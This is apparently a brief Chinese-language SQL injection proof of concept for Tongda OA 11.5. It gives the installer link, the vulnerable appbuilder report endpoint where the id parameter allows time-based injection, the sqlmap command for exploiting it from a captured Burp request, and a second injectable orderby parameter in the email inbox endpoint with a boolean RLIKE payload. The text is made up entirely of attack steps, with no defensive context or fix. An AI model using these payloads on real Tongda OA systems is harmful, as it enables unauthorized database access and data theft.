下载地址:https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe
1.登录一个账户
2.构造url http://192.168.1.1general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2,burp抓包
id参数存在延时注入
直接复制数据包,id参数加个*保存到sqlmap跑
python sqlmap.py -r 1.txt
orderby参数
构造/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=1&pagelimit=10&tag=×tamp=1598069103&total=
payload:RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END))